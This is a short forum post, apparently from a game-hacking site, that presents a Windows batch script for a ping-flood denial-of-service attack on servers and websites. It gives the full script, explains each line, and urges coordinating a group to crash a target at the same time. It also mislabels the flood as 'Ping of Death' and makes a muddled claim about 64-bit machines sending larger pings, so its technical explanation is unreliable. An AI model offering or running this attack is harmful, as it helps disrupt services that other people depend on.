[Batch] Making a Dos Attack (Servers and Websites)
Hello, today I'm going to be showing you how to make a simple Dos Attack.
Dos attacks are not very strong, but if you have a group that dos a server at the same time, you could easily crash it.
Code:
@echo off
echo -------------------------------------------------
echo ! This has been made by StaticHS @Mpgh.net!
echo -------------------------------------------------
set /p ping= <ping.txt
ping %ping% -t -l 65500
Code:
echo -------------------------------------------------
echo ! This has been made by StaticHS @Mpgh.net!
echo -------------------------------------------------
This shows who made it (if you release it).
Code:
set /p ping= <ping.txt
Makes the ping able to be edited through a .txt file.
Code:
ping %ping% -t -l 65500
Sends a lot of packets to the server in order to crash it.
Virus Scans:
https://www.virustotal.com/file/2c6e...is/1344153696/
Dos tut.rar - Jotti's malware scanThis alone will work in dial-up connections fairly well. Anyone know some dial-up servers? Didn't think so.
This is also called Ping of Death, and on 64-bit machines it is possible to send more bytes at once in your ping packets.
You also need an army of computers to successfully ping of death any vulnerable servers anyway.